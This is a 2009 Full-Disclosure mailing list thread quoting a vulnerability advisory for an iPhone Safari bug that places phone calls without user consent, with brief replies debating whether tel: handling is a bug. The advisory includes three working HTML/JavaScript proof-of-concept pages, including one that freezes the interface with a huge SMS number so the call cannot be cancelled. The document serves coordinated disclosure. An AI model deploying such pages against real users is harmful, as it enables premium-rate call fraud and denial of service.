[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)
- To: Collin Mulliner <collin@xxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)
- From: James Matthews <nytrokiss@xxxxxxxxx>
- Date: Fri, 19 Jun 2009 00:57:32 +0300
Bug or feature (old common argument within the software world) however I
don't think that Automatic dialing is what I want when I am browsing a page.
I would like a choice not for it to be done automatically.
On Thu, Jun 18, 2009 at 8:29 PM, Collin Mulliner <collin@xxxxxxxxxxxxxxx>wrote:
> Mike,
>
> just getting to the phone dialer is not a bug! That is what the tel:
> protocol is for. All most all mobile phones implement this, every time
> you open a tel: URL you will get to the dialer in some way.
>
> Collin
>
> Mike Ely wrote:
> > Confirmed on the T-Mobile G1 email app running OS version 1.5. Was
> wondering why my phone stepped on email to dial out when I read this email
> and then I read the subject line ;)
> >
> > FWIW, it didn't actually dial, just loaded the dialer with that number
> ready.
> >
> > Looks like this is a Webkit bug, not Safari.
> >
> > Collin Mulliner <collin@xxxxxxxxxxxxxxx> wrote:
> >
> >> Released since Apple published the iPhone 3.0 security fixes.
> >>
> >> Vulnerability Report
> >>
> >> --- BEGIN ADVISORY ---
> >>
> >> Manufacturer: Apple (www.apple.com)
> >> Device: iPhone 3G (iPhone 1st Gen)
> >> Firmware: 2.1 (possible earlier versions)
> >> Device Type: smart phone
> >>
> >> Subsystems: Safari (and mobile telephony)
> >>
> >> -----------------------------
> >>
> >> Short name:
> >> iPhone Safari phone-auto-dial (vulnerability)
> >>
> >> Vulnerability class:
> >> application logic bug
> >>
> >> Executive Summary:
> >> A malicious website can initiate a phone call without the need of user
> >> interaction. The destination phone number is chosen by the attacker.
> >>
> >> Risk: MEDIUM-HIGH
> >> Medium to high risk due to the possibility of financial gain through
> >> this attack by calling of premium rate numbers (e.g. 1-900 in the
> >> U.S.). Denial-of-service against arbitrary phone numbers through
> >> mass-calling. User cannot prevent attack.
> >>
> >> -----------------------------
> >>
> >> Reporter: Collin Mulliner <collin[AT]mulliner.org>
> >>
> >> -----------------------------
> >>
> >> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
> >>
> >> -----------------------------
> >>
> >> Time line:
> >>
> >> Oct. 20. 2008: Reported vulnerability to vendor.
> >> Oct. 20. 2008: Vendor acknowledges receiving our email.
> >> Not commenting on the vulnerability itself.
> >> Oct. 27. 2008: Sent update to vendor, also requesting a status report.
> >> Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
> >> Oct. 30. 2008: Sent additional information.
> >> Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
> >> version.
> >> Nov. 20. 2008: Public disclosure.
> >> Jun. 18. 2009: Full-Disclosure.
> >>
> >> -----------------------------
> >>
> >> Fix:
> >>
> >> iPhone OS 2.2
> >> iPhone OS 2.2.1
> >> iPhone OS 3.0
> >>
> >> -----------------------------
> >>
> >> Technical Details:
> >>
> >> The Safari version running on the iPhone supports handling the TEL [1]
> >> protocol through launching the telephony/dialer application. This is
> >> done by passing the provided phone number to the telephony
> >> application. Under normal conditions, loading a tel: URI results in a
> >> message box asking the user's permission to call the given number. The
> >> user is presented with the simple choice to either press call or
> >> cancel.
> >>
> >> A TEL URI can be opened automatically if the TEL URI is used as the
> >> source of an HTML iframe or frame, as the URL of a meta refresh, as
> >> the location of a HTTP 30X redirect, and as the location of the
> >> current or a new window using javascript.
> >>
> >> We discovered a security vulnerability that dismisses the "ask for
> >> permission to call" dialog in a way that chooses the "call" option
> >> rather than the "cancel" option.
> >>
> >> This condition occurs if a TEL URI is activated at the same time
> >> Safari is closed by launching an external application, for example
> >> launching the SMS application (in order to handle a SMS URI [2]). The
> >> SMS application can be launched through placing a SMS URI as the
> >> source of an iframe. This is shown in the first proof-of-concept
> >> exploit below.
> >>
> >> Further investigation showed that this behavior can be reproduced by
> >> launching other applications such as: Maps, YouTube, and iTunes.
> >> Launching these applications can be achieved through loading special
> >> URLs using the meta refresh tag. This is shown in the second
> >> proof-of-concept exploit below.
> >>
> >> We also discovered that the bug can also be triggered through popup
> >> windows (e.g. javascript alert). In this situation the initiating app
> >> does not need to be termianted in order to active the call.
> >>
> >> Finally, we discovered a second bug that can be used to perform
> >> malicious phone calls that cannot be prevented or canceled by the
> >> victim. This bug allows the attacker to freez the GUI (graphical user
> >> interface) for a number of seconds. While the GUI is frozen the call
> >> progresses in the background and cannot be stopped by the victim
> user.
> >> Freezing the GUI is achieved by passing a "very long" phone number to
> >> the SMS application. The SMS application, immediately after being
> >> started, freezes the iPhone GUI. Also switching off the iPhone cannot
> >> be performed fast enough in order to prevent the malicious call.
> >>
> >>
> >> [1] http://www.rfc-editor.org/rfc/rfc3966.txt
> >> [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
> >>
> >> -----------------------------
> >>
> >> Further Discussion:
> >>
> >> The dialing dialog is clearly shown to the user also the user, in most
> >> cases, can't press cancel quick enough in order to stop the initiation
> >> of the call. Once the external application is launched, the telephony
> >> application is running in the background performing the call. Only
> >> the call forwarding dialog (containing the "dismiss" button) indicates
> >> a call being made.
> >>
> >> -----------------------------
> >>
> >> Proof-of-Concept with plain HTML using the SMS application:
> >>
> >> <html>
> >> <head>
> >> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> >> </title>
> >> </head>
> >> <body>
> >> <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> >> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> >> <!-- second iframe is to attack quick users who manage to close the
> >> first call-dialog //-->
> >> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> >> </body>
> >> </html>
> >>
> >> Proof-of-Concept using javascript and the Maps application:
> >>
> >> <html>
> >> <head>
> >> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> >> </title>
> >> <meta http-equiv="refresh" content="0;
> >> URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
> >> </head>
> >> <body>
> >> <script lang=javascript>
> >> function a() {
> >> document.write("<iframe src=\"tel:+14089748388\" WIDTH=50
> >> HEIGHT=10></iframe>");
> >> }
> >> setTimeout("a()", 100);
> >> </script>
> >> </body>
> >> </html>
> >>
> >> Proof-of-Concept attack where the victim user cannot stop the malicious
> >> phone call:
> >>
> >> <html>
> >> <head>
> >> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> >> </title>
> >> </head>
> >> <body>
> >> <script lang=javascript>
> >> l = "<iframe src=\"sms:";
> >> for (i = 0; i < 10000; i++) {
> >> l = l + "3340948034298232";
> >> }
> >> l = l + "\" width=10 height=10></iframe><iframe
> >> src=\"tel:+14089748388\" height=10 width=10></iframe>";
> >> document.write(l);
> >> </script>
> >> </body>
> >> </html>
> >>
> >> -----------------------------
> >>
> >> More Detailed Information:
> >>
> >> Demo video available at:
> >> http://www.mulliner.org/iphone/
> >>
> >> Advisories:
> >> http://www.mulliner.org/security/advisories/
> >>
> >> --- END ADVISORY ---
> >>
> >>
> >> --
> >> Collin R. Mulliner <collin@xxxxxxxxxxxxxxx>
> >> info/pgp: finger collin@xxxxxxxxxxxxxxx
> >> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he
> >> does!
>
>
> --
> Collin R. Mulliner <collin@xxxxxxxxxxxxxxx>
> info/pgp: finger collin@xxxxxxxxxxxxxxx
> C gives you enough rope to hang yourself. C++ also gives you the tree
> object to tie it to.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
http://www.goldwatches.com
http://www.jewelerslounge.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/